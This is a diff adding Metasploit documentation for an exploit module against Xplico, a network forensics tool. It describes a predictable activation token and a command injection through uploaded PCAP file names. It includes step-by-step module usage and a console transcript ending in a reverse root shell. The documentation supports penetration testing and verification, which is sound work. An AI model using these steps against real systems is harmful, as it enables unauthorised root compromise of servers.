|
| 1 | +## Vulnerable Application |
| 2 | +This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user. |
| 3 | + |
| 4 | +The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet |
| 5 | +traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create |
| 6 | + a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try |
| 7 | +to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation. |
| 8 | +But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage. |
| 9 | + |
| 10 | +One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum |
| 11 | +of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation. |
| 12 | + |
| 13 | +**Vulnerable Application Installation Steps** |
| 14 | + |
| 15 | +Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0 |
| 16 | + |
| 17 | +[http://wiki.xplico.org/doku.php?id=ubuntu](http://wiki.xplico.org/doku.php?id=ubuntu) |
| 18 | + |
| 19 | +You may also give a try to virtualbox image provided by maintainer of Xplico. |
| 20 | +[https://sourceforge.net/projects/xplico/files/VirtualBox%20images/](https://sourceforge.net/projects/xplico/files/VirtualBox%20images/) |
| 21 | + |
| 22 | +## Verification Steps |
| 23 | + |
| 24 | +A successful check of the exploit will look like this: |
| 25 | + |
| 26 | +- [ ] Start `msfconsole` |
| 27 | +- [ ] `use exploit/linux/http/securityonion_xplico_exec` |
| 28 | +- [ ] Set `RHOST` |
| 29 | +- [ ] Set `PAYLOAD cmd/unix/reverse_awk` |
| 30 | +- [ ] Set `LHOST` |
| 31 | +- [ ] Run `exploit` |
| 32 | +- [ ] **Verify** that you are seeing `New user successfully registered` in console. |
| 33 | +- [ ] **Verify** that you are seeing `User successfully activated` in console. |
| 34 | +- [ ] **Verify** that you are seeing `Successfully authenticated` in console. |
| 35 | +- [ ] **Verify** that you are seeing `New Case successfully creted` in console. |
| 36 | +- [ ] **Verify** that you are seeing `New Sols successfully creted` in console. |
| 37 | +- [ ] **Verify** that you are seeing `PCAP successfully uploaded. Pcap parser is going to start on server side` in console. |
| 38 | +- [ ] **Verify** that you are getting `We are at PCAP decoding phase. Little bit more patience...` in console. |
| 39 | +- [ ] **Verify** that you have your root shell. |
| 40 | + |
| 41 | +## Scenarios |
| 42 | + |
| 43 | +``` |
| 44 | +msf > use exploit/linux/http/securityonion_xplico_exec |
| 45 | +msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30 |
| 46 | +RHOST => 12.0.0.30 |
| 47 | +msf exploit(securityonion_xplico_exec) > |
| 48 | +msf exploit(securityonion_xplico_exec) > exploit |
| 49 | +
|
| 50 | +[-] Exploit failed: A payload has not been selected. |
| 51 | +[*] Exploit completed, but no session was created. |
| 52 | +msf exploit(securityonion_xplico_exec) > set payload cmd/unix/ |
| 53 | +set payload cmd/unix/generic set payload cmd/unix/reverse_netcat |
| 54 | +set payload cmd/unix/reverse_awk |
| 55 | +msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk |
| 56 | +payload => cmd/unix/reverse_awk |
| 57 | +msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 |
| 58 | +LHOST => 12.0.0.1 |
| 59 | +msf exploit(securityonion_xplico_exec) > exploit |
| 60 | +
|
| 61 | +[*] Started reverse TCP handler on 12.0.0.1:4444 |
| 62 | +[*] Initiating new session on server side |
| 63 | +[*] Registering a new user |
| 64 | +[+] New user successfully registered |
| 65 | +[*] Username: mwbvnyowr |
| 66 | +[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT |
| 67 | +[*] Calculating em_key code of the user |
| 68 | +[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e |
| 69 | +[+] User successfully activated |
| 70 | +[*] Authenticating with our activated new user |
| 71 | +[+] Successfully authenticated |
| 72 | +[*] Creating new case |
| 73 | +[+] New Case successfully creted. Our pol_id = 36 |
| 74 | +[*] Creating new xplico session for pcap |
| 75 | +[+] New Sols successfully creted. Our sol_id = 54 |
| 76 | +[*] Uploading malformed PCAP file |
| 77 | +[+] PCAP successfully uploaded. Pcap parser is going to start on server side. |
| 78 | +[*] Parsing has started. Wait for parser to get the job done... |
| 79 | +[+] We are at PCAP decoding phase. Little bit more patience... |
| 80 | +[+] We are at PCAP decoding phase. Little bit more patience... |
| 81 | +[+] We are at PCAP decoding phase. Little bit more patience... |
| 82 | +[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300 |
| 83 | +
|
| 84 | +id |
| 85 | +uid=0(root) gid=0(root) groups=0(root) |
| 86 | +``` |
0 commit comments